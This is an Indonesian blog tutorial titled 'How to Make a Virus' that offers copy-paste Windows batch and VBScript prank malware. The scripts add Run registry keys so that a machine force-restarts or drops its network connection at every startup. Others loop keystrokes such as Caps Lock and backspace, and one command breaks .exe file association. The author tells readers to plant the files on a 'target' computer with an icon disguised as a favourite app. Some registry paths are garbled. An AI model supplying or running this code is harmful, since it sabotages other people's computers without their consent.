Galan Seseorang yang suka membaca, menulis, dan melakukan hal yang berkaitan dengan Dunia Teknologi.

Cara Membuat Virus

2 min read

Cara Membuat Virus

Dalam penggunaan komputer, virus menjadi momok yang menakutkan karena dapat membahayakan komputer. Namun dibalik semua itu, ternyata terdapat cara membuat virus yang dapat Anda terapkan dengan mudah.

Namun tidak se-mengerikan yang Anda pikirkan, karena virus ini hanyalah sebuah virus sederhana yang tidak merusak. Umumnya, hanya digunakan untuk berbuat jahil semata.

Sebelum mengetahuinya, alangkah lebih baik untuk mengenali jenis-jenis virus berbahaya yang biasa menyerang komputer.

Jenis-Jenis Virus di Komputer

cara membuat virus dan menyebarkannya

  • Virus Trojan: Dibuat untuk tujuan mencuri data dan mengendalikan data yang terdapat di komputer.
  • Virus Worm: Menggandakan diri sehingga akan memenuhi data dalam memori dan hard disk.
  • Memory Resident Virus: Dibuat untuk menginfeksi RAM, menjadikan sistem operasi menjadi lemot.
  • Virus Shortcut: Muncul dari flashdisk yang telah terinfeksi virus dan menyebarkannya di komputer.
  • Virus Adware: Selalu menampilkan iklan, biasanya terdapat di toolbar dan ekstensi yang ada di browser.
  • Virus Ransomware: Menyandera data pengguna, biasanya menyerang sistem operasi Windows lawas dan tidak rutin dilakukan update.

Sebenarnya, masih terdapat virus mematikan lainnya yang dapat menyerang komputer.

Akan tetapi, di sini Berakal hanya akan menjelaskan cara membuat virus sederhana, seperti yang telah dijelaskan di atas.

Virus ini hanya akan mengacaukan fungsi komputer tanpa merusak hardware atau membocorkan informasi.

Cara Membuat Virus melalui Script Sederhana

cara membuat virus komputer dan antivirusnya

1. Virus Shutdown

Terdapat dua jenis virus shutdown, yaitu melakukan shutdown secara otomatis dan melakukan shutdown saat menekan klik dua kali.

Pertama, melakukan shutdown secara otomatis setiap kali komputer dinyalakan. Namun, jangan asal menggunakan virus ini jika Anda tidak siap dengan konsekuensinya, risiko ditanggung sendiri ya!

echo @echo off>c:windowshartlell.bat echo break off>>c:windowshartlell.bat echo shutdown -r -t 11 -f>>c:windowshartlell.bat echo end>>c:windowshartlell.bat reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f echo You have been HACKED. PAUSE

Copy dan simpan file tersebut, Anda dapat menyimpannya di Notepad dan gunakan ekstensi .bat. Tinggal klik untuk mengaktifkannya.

Kedua, memaksa komputer target melakukan shutdown. Untuk menggunakannya, buka Notepad dan copy script di bawah. Kemudian, save file dengan nama ForceShutdown.bat dan pilih type All File.

@echo off msg * I don’t like you shutdown -c “Error! Komputer kamu terpaksa harus Shutdown!” -s

Nah, untuk mengaktifkannya, silahkan klik dua kali pada file-nya dan virus akan otomatis berjalan.

2. Virus Caps Lock

Seperti namanya, virus ini akan menyebabkan ketikan menjadi huruf besar. Hal ini tentu akan sangat menjengkelkan, khususnya saat bertukar pesan karena semua huruf berubah menjadi kapital.

Set wshShell =wscript.CreateObject(“WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “{CAPSLOCK}” loop

Silahkan copy script di atas, selanjutnya namai dengan ForceCapsLock.vbs dan pilih All File untuk type-nya. Untuk mengaktifkannya, tinggal klik dua kali.

3. Mematikan Koneksi Internet 

Dalam satu jaringan, Anda dapat mematikan koneksi internet teman yang sedang mendownload. Karena hal tersebut dapat mempengaruhi bandwidth yang berakibat lemot. Nah, Anda dapat menggunakan script di bawah ini.

echo @echo off>c:windowswimn32.bat echo break off>>c:windowswimn32.bat echo ipconfig/release_all>>c:windowswimn32.bat echo end>>c:windowswimn32.bat reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f echo You Have Been HACKED! PAUSE

Anda dapat menyimpan file tersebut dengan nama apapun, namun gunakan ekstensi .bat.

4. Virus Backspace

Virus ini dapat menyebabkan tombol backspace menjadi eror dan selalu menekan secara otomatis. Langsung saja, Anda dapat menyalin script berikut ke Notepad.

MsgBox “kembali ke menu sebelumnya” Set wshShell =wscript.CreateObject(“WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “{bs}” loop

Kemudian, simpan file dengan nama apapun, namun gunakan ekstensi .vbs dan pilih type menjadi All Files.

“Supaya dapat berjalan lancar, silahkan simpan file virus seperti di atas pada komputer target. Lalu, letakkan file tersebut di desktop dan ubah ikon shortcut menjadi aplikasi favorit target”

5. Virus CMD

Cara membuat virus yang satu ini terbilang berbeda dari lainnya. Karena cara ini tidak menggunakan Notepad, melainkan menggunakan CMD. Untuk menggunakannya, simak cara di bawah ini:

  • Buka program CMD dengan cara klik Start > ketikkan CMD. Anda juga dapat menekan tombol Windows + R.
  • Selanjutnya, ketikkan “ASSOC.exe=.hank” tanpa tanda petik.
  • Kemudian, tekan enter untuk mengaktifkannya.

Cara kerja dari virus ini yaitu untuk membuat program atau aplikasi berekstensi .exe tidak mau berjalan. Untuk mengembalikannya, buka kembali CMD dan ketikkan “ASSOC.exe=EXEFILE” tanpa tanda petik.

Demikianlah cara membuat virus sederhana yang dapat Anda terapkan melalui Notepad maupun CMD. Jangan lupa untuk segera mengembalikan ke semula setelah menggunakannya.

Galan Seseorang yang suka membaca, menulis, dan melakukan hal yang berkaitan dengan Dunia Teknologi.

Tema Windows 7

Manarul
5 min read

Cara Menggunakan VPN di PC

Manarul
2 min read

Cara Membuat Brosur di Word

Manarul
1 min read

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *